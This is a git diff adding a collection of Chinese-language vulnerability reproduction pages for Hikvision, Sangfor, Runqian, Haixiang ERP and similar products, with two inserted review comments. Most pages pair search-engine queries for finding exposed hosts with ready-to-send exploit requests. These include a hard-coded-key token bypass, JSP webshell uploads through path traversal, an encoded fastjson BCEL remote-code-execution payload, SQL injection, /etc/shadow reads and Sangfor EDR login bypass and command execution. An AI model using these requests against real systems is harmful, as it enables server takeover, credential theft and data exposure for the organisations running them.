+Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo +Cache-Control:max-age=0 +Connection:close +Content-Length: 52 + +service=http://xx.xx.xx.xx/home/index.action +``` + +![1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa.png](./img/kDLBwyHdk2d3W6A_/1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa-589948.png) + +2. 构造token绕过认证(内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证) + +secretkey是代码里写死的(默认值:secretKeyIbuilding) + +token值需要进行MD5加密(32位大写) + +组合:token=MD5(url+"secretKeyIbuilding") + +```plain +http://xx.xx.xx.xx/eps/api/resourceOperations/uploadsecretKeyIbuilding +``` + +![1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287.png](./img/kDLBwyHdk2d3W6A_/1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287-296469.png) + +3. 
构造上传文件,上传成功且返回了resourceUuid值 + +```plain +POST /eps/api/resourceOperations/upload?token=DFB0D4034A82263A4DA9A37EB0DA687B HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo +Cache-Control:max-age=0 +Connection:close +Content-Length: 178 + +------WebKitFormBoundaryGEJwjlojPo +Content-Disposition: form-data;name="fileUploader"; filename="test.jsp" +Content-Type: image/jpeg + +1 +------WebKitFormBoundaryGEJwjlojPo-- +``` + +![1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215.png](./img/kDLBwyHdk2d3W6A_/1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215-549185.png) + +4. 上传文件位置 + +```plain +http://xx.xx.xx.xx/eps/upload/resourceUuid的值.jsp +``` + +![1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13.png](./img/kDLBwyHdk2d3W6A_/1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13-384332.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md b/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md new file mode 100644 index 0000000..dff0d3a --- /dev/null +++ b/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md 
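Review bot: the token derivation `token=MD5(url+"secretKeyIbuilding")` (32-character uppercase) in the resourceOperations file is the same hard-coded key the iVMS-8700 download file relies on (`url+secretKeyIbuilding`); cross-reference the two pages and say plainly that every instance still running the default key is exposed on both endpoints, so the mitigation is the vendor fix or changing the key rather than blocking one URL. Also note that the example token `DFB0D4034A82263A4DA9A37EB0DA687B` was computed for the `http://xx.xx.xx.xx/...` placeholder and is specific to that string, so it is illustrative only; otherwise a reader scanning their own estate may record a false negative.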
@@ -0,0 +1,34 @@ +# 海康威视流媒体管理服务器 user.xml 账号密码泄漏漏洞 + +# 一、漏洞简介 +HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码 + +# 二、影响版本 ++ HIKVISION 流媒体管理服务器 + +# 三、资产测绘 ++ hunter:`web.body="流媒体管理服务器"&&web.body="杭州海康威视系统技术有限公司 版权所有"` + +![1691852350086-59553de6-b647-4dde-8c1b-77f90d88762d.png](./img/W2pLsDAqUjtLCdE8/1691852350086-59553de6-b647-4dde-8c1b-77f90d88762d-861201.png) + ++ 登录页面 + +![1691852369924-5fa9d9eb-7580-4355-bf97-6d42fcbf083f.png](./img/W2pLsDAqUjtLCdE8/1691852369924-5fa9d9eb-7580-4355-bf97-6d42fcbf083f-150590.png) + +# 四、漏洞复现 +```plain + /config/user.xml +``` + +![1691852415460-c3a7cb87-9703-4d03-b952-fbd260cb3f71.png](./img/W2pLsDAqUjtLCdE8/1691852415460-c3a7cb87-9703-4d03-b952-fbd260cb3f71-670431.png) + +账号密码为base64加密 + +测试登录,登录成功 + +![1691852465095-1abcb3c1-7dc6-4873-b8e8-a24ea2499ef4.png](./img/W2pLsDAqUjtLCdE8/1691852465095-1abcb3c1-7dc6-4873-b8e8-a24ea2499ef4-075512.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: \ No newline at end of file diff --git a/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md b/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md new file mode 100644 index 0000000..ef749b4 --- /dev/null +++ b/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md 
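Review bot: the user.xml file says the credentials are "base64加密"; base64 is an encoding, not encryption, and the next line confirms the decoded pair logs in directly, so say encoding and make the point that the password is effectively stored in clear in a file served without authentication. The fenced PoC line has a stray leading space before `/config/user.xml`. The mitigation (deny external access to `/config/` and rotate the exposed account) is not stated.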
@@ -0,0 +1,28 @@ +# 海康威视视频编码设备接入网关 showFile.php 任意文件下载漏洞 + +# 一、漏洞简介 +海康威视视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞 + +# 二、影响版本 ++ HIKVISION 视频编码设备接入网关 + +# 三、资产测绘 ++ hunter:`web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"` + +![1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea.png](./img/yRD1Rk7vrCTRxiTa/1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea-234903.png) + ++ 登录页面 + +![1691857519082-eb318732-d51e-4393-89a9-7296293727ba.png](./img/yRD1Rk7vrCTRxiTa/1691857519082-eb318732-d51e-4393-89a9-7296293727ba-690646.png) + +# 四、漏洞复现 +```plain +/serverLog/showFile.php?fileName=../web/html/main.php +``` + +![1691857555317-62dd3fcc-287a-40ea-9cb0-6f4d7a94351e.png](./img/yRD1Rk7vrCTRxiTa/1691857555317-62dd3fcc-287a-40ea-9cb0-6f4d7a94351e-655220.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: \ No newline at end of file diff --git a/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md b/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md new file mode 100644 index 0000000..5fa24bd --- /dev/null +++ b/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md 
@@ -0,0 +1,42 @@ +# 海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞 + +# 一、漏洞简介 +海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞。 + +# 二、影响版本 ++ HIKVISION 视频编码设备接入网关 + +# 三、资产测绘 ++ hunter:`web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"` + +![1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea.png](./img/qV-R5KN1BBW4A5If/1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea-364641.png) + ++ 登录页面 + +![1691857519082-eb318732-d51e-4393-89a9-7296293727ba.png](./img/qV-R5KN1BBW4A5If/1691857519082-eb318732-d51e-4393-89a9-7296293727ba-071734.png) + +# 四、漏洞复现 +```plain +POST /data/userInfoData.php HTTP/1.1 +Host: +Content-Length: 38 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Origin: +Referer: +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +page=1&rows=20&sort=userId&order=asc +``` + +![1711075731488-6717f765-229a-4079-a292-92c54ee39180.png](./img/qV-R5KN1BBW4A5If/1711075731488-6717f765-229a-4079-a292-92c54ee39180-702744.png) + +[hikvision-spbmjrwg-userinfodate-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1711075901506-37d4c294-7138-466e-b8bb-17d265f17fe6.yaml) + + + +> 更新: 2024-03-22 10:51:47 +> 原文: \ No newline at end of file diff --git a/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md b/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md new file mode 100644 index 0000000..91d13a2 --- /dev/null +++ b/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md @@ -0,0 +1,23 @@ +# 海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936) + +海康威视运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。 + +## fofa + +```javascript +header="X-Content-Type-Options: nosniff" && body="

Welcome to OpenResty!

" && header="X-Xss-Protection: 1; mode=block" +``` + +## poc + +```javascript +POST /bic/ssoService/v1/applyST HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Content-Type: application/json +cmd: whoami + +{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c
$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}} +``` + +![image-20241211211226921](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112112999.png) \ No newline at end of file diff --git a/海翔ERP-SQL注入漏洞.md b/海翔ERP-SQL注入漏洞.md new file mode 100644 index 0000000..3a1c6db --- /dev/null +++ b/海翔ERP-SQL注入漏洞.md 
@@ -0,0 +1,18 @@ +## 海翔ERP SQL注入漏洞 + +海翔ERP存在SQL注入漏洞,由于系统未对用户输入的内容进行过滤,攻击者可以通过/getylist_login.do路由进行SQL注入,从而获取数据库中的敏感信息。 + + +## poc +``` +POST /getylist_login.do HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 77 +Accept-Encoding: gzip +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +accountname=test' and (updatexml(1,concat(0x7e,(select md5(123)),0x7e),1));-- +``` + diff --git a/润乾报表InputServlet存在任意文件上传漏洞.md b/润乾报表InputServlet存在任意文件上传漏洞.md new file mode 100644 index 0000000..1a1bfe0 --- /dev/null +++ b/润乾报表InputServlet存在任意文件上传漏洞.md 
@@ -0,0 +1,50 @@ +# 润乾报表InputServlet存在任意文件上传漏洞 + +# 一、漏洞简介 +润乾报表是一个纯JAVA的企业级报表工具支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,提供高效的报表设计方案、强大的报表展现能力、灵活的部署机制,支持强关联语义模型,并且具备强有力的填报功能和olap分析,为企业级数据分析与商业智能提供了高性能、高效率的报表系统解决方案。润乾报表InputServlet存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 润乾报表 + +# 三、资产测绘 ++ hunter`app.name="润乾报表平台"` ++ 特征 + +![1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799.png](./img/nF5vX5OkCsHgPsZX/1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799-019490.png) + +# 四、漏洞复现 +```java +POST /InputServlet?action=12 HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 241 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="upsize" + +1024 +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="/\..\\..\\..\2211.jsp" +Content-Type: image/jpeg + +123 +--00content0boundary00-- +``` + +![1712713445103-ad84172d-20aa-42b8-83ce-f74c1e305e7c.png](./img/nF5vX5OkCsHgPsZX/1712713445103-ad84172d-20aa-42b8-83ce-f74c1e305e7c-519159.png) + +文件上传位置 + +```java +/2211.jsp +``` + +![1712713472577-df0cff32-9c0d-4008-ac1a-d3b6be3fbe2d.png](./img/nF5vX5OkCsHgPsZX/1712713472577-df0cff32-9c0d-4008-ac1a-d3b6be3fbe2d-185970.png) + + + +> 更新: 2024-04-16 14:37:57 +> 原文: \ No newline at end of file diff --git a/润乾报表InputServlet存在任意文件读取漏洞.md b/润乾报表InputServlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..c62f626 --- /dev/null +++ b/润乾报表InputServlet存在任意文件读取漏洞.md 
@@ -0,0 +1,31 @@ +# 润乾报表InputServlet存在任意文件读取漏洞 + +# 一、漏洞简介 +润乾报表是一个纯JAVA的企业级报表工具支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,提供高效的报表设计方案、强大的报表展现能力、灵活的部署机制,支持强关联语义模型,并且具备强有力的填报功能和olap分析,为企业级数据分析与商业智能提供了高性能、高效率的报表系统解决方案。润乾报表InputServlet存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证,使系统处于极不安全状态。 + +# 二、影响版本 ++ 润乾报表 + +# 三、资产测绘 ++ hunter`app.name="润乾报表平台"` ++ 特征 + +![1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799.png](./img/3t8T2Ov2W0KH4EFf/1712713418597-1304fe4b-6423-40c5-b6c4-622581d06799-025732.png) + +# 四、漏洞复现 +```java +POST /InputServlet?action=13 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Content-Type: application/x-www-form-urlencoded +Connection: close + +file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config +``` + +![1713167588772-85cd2ff7-f7f1-417c-a916-bb61f767a6e9.png](./img/3t8T2Ov2W0KH4EFf/1713167588772-85cd2ff7-f7f1-417c-a916-bb61f767a6e9-908853.png) + + + +> 更新: 2024-04-16 14:37:57 +> 原文: \ No newline at end of file diff --git a/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md b/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md new file mode 100644 index 0000000..d631c92 --- /dev/null +++ b/润申企业标准化管理系统DefaultHandler存在SQL注入漏洞.md 
@@ -0,0 +1,55 @@ +# 润申企业标准化管理系统DefaultHandler存在SQL注入漏洞 + +# 一、漏洞简介 +润申企业标准化管理系统DefaultHandler存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 润申企业标准化管理系统 + +# 三、资产测绘 ++ hunter`web.body="PDCA/js/_publicCom.js"` ++ 特征 + +![1706683539418-696ecda0-4ff3-464b-b2e3-babb1ff1535c.png](./img/vxgv315vbLxerLKK/1706683539418-696ecda0-4ff3-464b-b2e3-babb1ff1535c-588200.png) + +# 四、漏洞复现 +```plain +POST /ashx/DefaultHandler.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +action=GetDetail&status=300&id=1+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28122%29%2BCHAR%2883%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28120%29%2BCHAR%2888%29%2BCHAR%28103%29%2BCHAR%2886%29%2BCHAR%28122%29%2BCHAR%2876%29%2BCHAR%2881%29%2BCHAR%2868%29%2BCHAR%2871%29%2BCHAR%2866%29%2BCHAR%28104%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%2890%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28105%29%2BCHAR%2865%29%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28118%29%2BCHAR%28119%29%2BCHAR%28119%29%2BCHAR%28119%29%2BCHAR%28111%29%2BCHAR%2877%29%2BCHAR%2890%29%2BCHAR%28105%29%2BCHAR%28103%29%2BCHAR%28111%29%2BCHAR%2880%29%2BCHAR%28106%29%2BCHAR%2869%29%2BCHAR%2887%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+BUHl +``` + +![1706683626241-47cd4bf6-62a1-4c76-9ea8-17ea7a0f0ca8.png](./img/vxgv315vbLxerLKK/1706683626241-47cd4bf6-62a1-4c76-9ea8-17ea7a0f0ca8-238255.png) + +sqlmap + +```plain +POST /ashx/DefaultHandler.ashx HTTP/1.1 +Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 32 + +action=GetDetail&status=300&id=1 +``` + +![1706683667235-7e291c4d-59f6-43a2-b4be-f55a0a06a191.png](./img/vxgv315vbLxerLKK/1706683667235-7e291c4d-59f6-43a2-b4be-f55a0a06a191-376936.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: \ No newline at end of file diff --git a/深信服EDR平台存在任意用户登录漏洞.md b/深信服EDR平台存在任意用户登录漏洞.md new file mode 100644 index 0000000..d355a7d --- /dev/null +++ b/深信服EDR平台存在任意用户登录漏洞.md @@ -0,0 +1,24 @@ +# 深信服EDR平台存在任意用户登录漏洞 + +# 一、漏洞简介 + 深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。该EDR系统存在任意用户登录漏洞,攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息。 + +# 二、影响版本 ++ 深信服EDR + +# 三、资产测绘 ++ fofa`app="SANGFOR-EDR"``title="终端检测响应平台"` + +![1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6.png](./img/sKnLfiYkMwtg-rAE/1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6-627743.png) + +# 四、漏洞复现 +```plain +/ui/login.php?user=admin +``` + +![1716179600545-25ccad33-6f0c-4979-85ee-1e4a54c2d137.png](./img/sKnLfiYkMwtg-rAE/1716179600545-25ccad33-6f0c-4979-85ee-1e4a54c2d137-926641.png) + + + +> 更新: 2024-05-23 13:32:28 +> 原文: \ No newline at end of file diff --git a/深信服EDR平台存在远程命令执行漏洞.md b/深信服EDR平台存在远程命令执行漏洞.md new file mode 100644 index 0000000..c488b8f --- /dev/null +++ b/深信服EDR平台存在远程命令执行漏洞.md 
@@ -0,0 +1,24 @@ +# 深信服EDR平台存在远程命令执行漏洞 + +# 一、漏洞简介 + 深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。深信服终端监测响应平台(EDR)存在远程命令执行漏洞。 + +# 二、影响版本 ++ 深信服EDR + +# 三、资产测绘 ++ fofa`app="SANGFOR-EDR"``title="终端检测响应平台"` + +![1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6.png](./img/SSNDnO_IRu30np4k/1716179568863-6a3ef6e1-44be-4250-a0b9-6e869186adc6-578437.png) + +# 四、漏洞复现 +```plain +/tool/log/c.php?strip_slashes=system&host=id +``` + +![1716179905089-bcaa2ab3-5127-42cb-8f89-09f79a843007.png](./img/SSNDnO_IRu30np4k/1716179905089-bcaa2ab3-5127-42cb-8f89-09f79a843007-377633.png) + + + +> 更新: 2024-05-23 13:32:28 +> 原文: \ No newline at end of file diff --git a/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md b/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md new file mode 100644 index 0000000..5620fe8 --- /dev/null +++ b/深信服SANGFOR终端检测响应平台---任意用户免密登录,前台RCE.md @@ -0,0 +1,29 @@ +## SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE + +## FOFA语法 +``` +title="SANGFOR终端检测响应平台" +icon_hash="1307354852" +``` +## 鹰图搜索 +``` +web.title="SANGFOR终端检测响应平台" +web.icon=="68e28d49856759ddeb91b6be3d6f7e42" +``` + +## 漏洞复现 +路由后拼接/ui/login.php?user={{需要登录的用户名}} + +这边以admin权限用户为例 +``` +GET /ui/login.php?user=admin HTTP/1.1 + +Host: {{Hostname}} +``` + +## 前台RCE +``` +GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1 + +Host: {{Hostname}} +``` diff --git a/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md b/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md new file mode 100644 index 0000000..9aceade --- /dev/null +++ b/深信服SG上网优化管理系统-catjs.php-任意文件读取漏洞.md @@ -0,0 +1,6 @@ +## 深信服SG上网优化管理系统 catjs.php 任意文件读取漏洞 +``` +POST /php/catjs.php + +[" ../../../../../../etc/shadow"] +``` diff --git a/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md b/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md new file mode 100644 index 0000000..761fa18 --- /dev/null +++ b/深信服SG上网优化管理系统catjs存在任意文件读取漏洞.md 
@@ -0,0 +1,33 @@ +# 深信服SG上网优化管理系统catjs存在任意文件读取漏洞 + +# 一、漏洞简介 +SANGFOR上网优化管理系统是一款集上网行为管理、网络准入、设备准入以及业务访问行为分析于一体的安全产品。核心优势:多种认证方式、全面的审计能力、支持多种应用的封堵、*的流量控制;准确识别iot设备、统一管理硬件资产;强管控违规用户,精细分析行为画像;部署实施简单,维护成本低。全网行为管理基于端点无感知、少故障节点、不影响原有网络为原则的产品设计理念,致力于给客户带来更好的使用体验。深信服SG上网优化管理系统catjs存在任意文件读取漏洞 + +# 二、影响版本 ++ 深信服SG上网优化管理系统 + +# 三、资产测绘 ++ fofa`title="SANGFOR上网优化管理"` ++ 特征 + +![1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38.png](./img/tVIicowd7O9vW7DB/1713460250581-3ce6b4ad-84c1-4a1c-83c2-a67e0d664c38-221870.png) + +# 四、漏洞复现 +```plain +POST /php/catjs.php HTTP/1.1 +Host: +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 35 + +["../../../../../../../etc/passwd"] +``` + +![1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa.png](./img/tVIicowd7O9vW7DB/1713460280458-dae40fc1-b98b-4c65-b626-c1732fdac8fa-365869.png) + + + +> 更新: 2024-04-19 08:49:27 +> 原文: \ No newline at end of file diff --git a/深信服下一代防火墙NGAF-RCE漏洞.md b/深信服下一代防火墙NGAF-RCE漏洞.md new file mode 100644 index 0000000..8e2f489 --- /dev/null +++ b/深信服下一代防火墙NGAF-RCE漏洞.md @@ -0,0 +1,21 @@ + +## 深信服下一代防火墙NGAF RCE漏洞 + +## POC +``` +POST /LogInOut.php HTTP/1.1 